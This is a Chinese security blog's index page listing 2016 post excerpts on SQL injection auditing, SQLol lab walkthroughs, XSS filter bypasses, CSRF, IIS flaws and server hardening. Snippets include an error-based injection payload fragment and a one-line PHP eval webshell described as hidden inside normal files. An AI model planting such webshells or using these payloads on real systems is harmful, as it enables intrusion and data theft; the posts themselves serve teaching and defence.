上一页 1 ··· 12 13 14 15 16
摘要: Insert: 语法:INSERT INTO table_name (列1, 列2,...) VALUES (值1, 值2,....) 报错注入: insert into test(id,name,pass) values (6,'xiaozi' or updatexml(1,concat(0x7e 阅读全文
posted @ 2016-07-21 10:06 Bypass 阅读(1748) 评论(0) 推荐(0) 编辑
摘要: 使用发包工具构造http请求包检测 以fiddler工具为例,构造如下图的请求包: 1 GET http://192.168.174.145/ HTTP/1.12 Host: 192.168.174.1453 Range: bytes=0-184467440737095516154 Connecti 阅读全文
posted @ 2016-07-07 14:37 Bypass 阅读(10885) 评论(0) 推荐(0) 编辑
摘要: 原文出处:http://my.oschina.net/longquan/blog/155905 首先认识一下小马,一般大马容易暴露,骇客都会留一手,把小马加入正常PHP文件里面 <?php eval ($_POST[a]);?> //密码为a,使用中国菜刀连接 隐藏很深的小马 fputs(fopen 阅读全文
posted @ 2016-06-30 12:29 Bypass 阅读(5463) 评论(0) 推荐(0) 编辑
摘要: 参考学习网址:http://m.blog.csdn.net/article/details?id=39290941 恶意代码清除实战 http://www.freebuf.com/articles/web/83860.html 手工查杀病毒 http://www.360doc.com/content 阅读全文
posted @ 2016-06-24 08:51 Bypass 阅读(297) 评论(0) 推荐(0) 编辑
摘要: 一.CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 二.CSRF可以做什么? 你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的 阅读全文
posted @ 2016-06-17 17:44 Bypass 阅读(655) 评论(1) 推荐(0) 编辑
摘要: XSS漏洞验证经常遇到一些过滤,如何进行有效验证和绕过过滤呢,这里小结一下常见的一些标签,如<a><img>等。 参考链接:http://www.jb51.net/tools/xss.htm http://d3adend.org/xss/ghettoBypass ';alert(String.fro 阅读全文
posted @ 2016-06-16 14:34 Bypass 阅读(49299) 评论(0) 推荐(0) 编辑
摘要: IIS短文件名漏洞在windows服务器上面非常常见,也就是利用“~”字符猜解暴露短文件/文件夹名,比如,采用这种方式构造URL:http://aaa.com/abc~1/.aspx,根据IIS返回的错误信息,猜测该路径或文件是否存在,具体可参考这篇文章:http://www.freebuf.com 阅读全文
posted @ 2016-06-15 12:26 Bypass 阅读(3250) 评论(0) 推荐(0) 编辑
摘要: 0x01 简介与下载 URLScan是集成在IIS上的,可以制约的HTTP请求的安全工具。通过阻止特定的HTTP请求,URLScan安全工具有助于防止潜在的有害的请求到达服务器上的应用。 最新版URLScan 3.1,支持IIS 5.1,IIS 6和IIS 7在Windows Vista和Windo 阅读全文
posted @ 2016-06-15 12:21 Bypass 阅读(7083) 评论(0) 推荐(0) 编辑
摘要: 0x01 背景 最近在学习PHP代码审计,这里做一个SQL注入总结,是对自己学习知识的总结,也是为自己学习的笔记,方便自己反复翻阅。 0x02 PHP代码审计-SQL注入 挖掘SQL注入漏洞的时候,最简单也最容易被发现的就是什么都没过滤的情况。 代码示例 <?php $id = $_REQUEST[ 阅读全文
posted @ 2016-05-30 11:18 Bypass 阅读(687) 评论(0) 推荐(0) 编辑
摘要: 0x01 背景 现在的WEB应用对SQL注入的防护基本都是判断GPC是否开启,然后使用addlashes函数对单引号等特殊字符进行转义。但仅仅使用这样的防护是存在很多盲点的,接上篇http://www.cnbraid.com/2016/04/29/sql5/,这里介绍另外两种情况。盲点如下:①FIL 阅读全文
posted @ 2016-05-28 21:46 Bypass 阅读(176) 评论(0) 推荐(0) 编辑
摘要: 0x01 背景 现在的WEB应用对SQL注入的防护基本都是判断GPC是否开启,然后使用addlashes函数对单引号等特殊字符进行转义。但仅仅使用这样的防护是存在很多盲点的,比如最经典的整型参数传递,也即被带入数据库查询的参数是整型、数组中的key没过滤被带入了查询以及全局过滤了GET、POST但没 阅读全文
posted @ 2016-05-28 21:44 Bypass 阅读(361) 评论(0) 推荐(0) 编辑
摘要: 0x01 背景 首先我们了解下宽字节注入,宽字节注入源于程序员设置MySQL连接时错误配置为:set character_set_client=gbk,这样配置会引发编码转换从而导致的注入漏洞。具体原理如下:1.正常情况下当GPC开启或使用addslashes函数过滤GET或POST提交的参数时,黑 阅读全文
posted @ 2016-05-28 21:42 Bypass 阅读(528) 评论(0) 推荐(0) 编辑
摘要: 0x01 背景 现在的WEB程序基本都有对SQL注入的全局过滤,像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤,尤其是单引号。二次注入也是一种比较常见的注入,它涉及到入库和出库。因为有全局转义所以入库的时候: Insert into ta 阅读全文
posted @ 2016-05-28 21:39 Bypass 阅读(330) 评论(0) 推荐(0) 编辑
摘要: 0x01 背景 现在的WEB程序基本都有对SQL注入的全局过滤,像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤,尤其是单引号。同上一篇,我们需要找一些编码解码的函数来绕过全局防护,本篇介绍base64decode()的情况。漏洞来源于乌云 阅读全文
posted @ 2016-05-28 21:37 Bypass 阅读(356) 评论(0) 推荐(0) 编辑
摘要: 0x01 背景 现在的WEB程序基本都有对SQL注入的全局过滤,像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤,尤其是单引号。遇到这种情况我们就需要找一些编码解码的函数来绕过全局防护,这篇文章讲urldecode()的情况,同样大牛请自觉 阅读全文
posted @ 2016-05-28 21:36 Bypass 阅读(396) 评论(0) 推荐(0) 编辑
摘要: 0x01 背景 首先恭喜Seay法师的力作《代码审计:企业级web代码安全架构》,读了两天后深有感触。想了想自己也做审计有2年了,决定写个PHP代码审计实例教程的系列,希望能够帮助到新人更好的了解这一领域,同时也作为自己的一种沉淀。大牛请自觉绕道~ 0x02 环境搭建 PHP+MySql的集成环境特 阅读全文
posted @ 2016-05-28 21:34 Bypass 阅读(213) 评论(0) 推荐(0) 编辑
摘要: http://www.secpulse.com/archives/3537.html 阅读全文
posted @ 2016-05-28 11:22 Bypass 阅读(160) 评论(0) 推荐(0) 编辑
摘要: SQLol上面的挑战共有14关,接下来我们一关一关来突破。 Challenge 0 目的是让查询返回所有的用户名,而不是只有一个。 SELECT username FROM users WHERE username = 【'1'】 GROUP BY username ORDER BY usernam 阅读全文
posted @ 2016-05-28 00:48 Bypass 阅读(544) 评论(0) 推荐(0) 编辑
摘要: 访问首页的delete模块,http://127.0.0.1/sql/delete.php,开始对delete模块进行测试。 delete语法: 几个位置都可能存在注入,这里只演示一种。 下面演示注入到不同位置的方法。 一、String in WHERE clause 构造POC: 获取数据库 二、 阅读全文
posted @ 2016-05-26 20:57 Bypass 阅读(1314) 评论(0) 推荐(0) 编辑
摘要: 访问首页的update模块http://127.0.0.1/sql/update.php,开始对update模块进行测试。 update语法: 接收的参数可能拼接到上述语句中【】的任一个位置,4个位置,共有5种不同的类型。下面开始演示: 一、String in WHERE clause 构造POC: 阅读全文
posted @ 2016-05-26 20:47 Bypass 阅读(1736) 评论(0) 推荐(0) 编辑
摘要: 访问首页的insert模块,http://127.0.0.1/sql/insert.php,开始对insert模块进行测试。 insert语句: 接收的参数可能拼接到上述语句中【】的任一个位置。 在这里我们一般使用 1、报错注入 2、盲注(布尔类型、时间延迟类型) 有的注入点可以同时使用多种方法注入 阅读全文
posted @ 2016-05-26 20:14 Bypass 阅读(1561) 评论(0) 推荐(0) 编辑
摘要: 前面,我们已经安装好了SQLol,打开http://localhost/sql/,首先跳转到http://localhost/sql/select.php,我们先从select模块进行测试。 一条完成Select语句,大致可以这样表示: 接收的参数可能拼接到上述语句中【】的任一个位置。 注射位置不同 阅读全文
posted @ 2016-05-23 00:07 Bypass 阅读(3367) 评论(0) 推荐(0) 编辑
摘要: 最近下载了SQLol测试了一下,感觉挺好玩的,做一下记录。 SQLol是一个可配置得SQL注入测试平台,它包含了一系列的挑战任务,让你在挑战中测试和学习SQL注入语句,SQLol还是比较有创意的项目。 SQLol is now part of the Magical Code Injection R 阅读全文
posted @ 2016-05-22 20:20 Bypass 阅读(2702) 评论(0) 推荐(0) 编辑
摘要: 在Tomcat安装目录中,conf存放关于Tomcat服务器的全局配置,其中tomcat-users.xml、server.xml、web.xml。 tomcat-users.xml 配置 一:tomcat6配置管理员信息 1:打开tomcat6下的 /conf/tomcat-users.xml文件 阅读全文
posted @ 2016-05-12 10:52 Bypass 阅读(662) 评论(0) 推荐(0) 编辑
摘要: 参数化查询(Parameterized Query 或 Parameterized Statement)是访问数据库时,在需要填入数值或数据的地方,使用参数 (Parameter) 来给值。 在使用参数化查询的情况下,数据库服务器不会将参数的内容视为SQL指令的一部份来处理,而是在数据库完成SQL指 阅读全文
posted @ 2016-05-08 19:30 Bypass 阅读(3358) 评论(0) 推荐(0) 编辑
摘要: 网站安全中,对目录的执行权限是非常敏感的,一般来说,可以写入的目录是不能够拥有脚本的执行权限的,可写入的目录如: data、uploads,data目录主要是基本配置文件和缓存数据,uploads则是附件上传保存的目录,本篇将针对不同服务器环境来介绍如何取消这些目录的执行权限,当然我们也建议用户其他 阅读全文
posted @ 2016-04-28 16:17 Bypass 阅读(7942) 评论(0) 推荐(3) 编辑
摘要: 为防止漏洞被利用,需要采取必要措施,关闭以上端口,以保证系统更加安全。 window2003 关闭135端口的方法 要关闭此端口,只需停止DCOM接口服务即达到目的。下面是详细操作过程。 1、打开“组件服务”控制台 按 WIN+R 组合键打开运行对话框,输入“dcomcnfg”,单击“确定”,打开组 阅读全文
posted @ 2016-04-01 18:00 Bypass 阅读(6544) 评论(0) 推荐(0) 编辑
上一页 1 ··· 12 13 14 15 16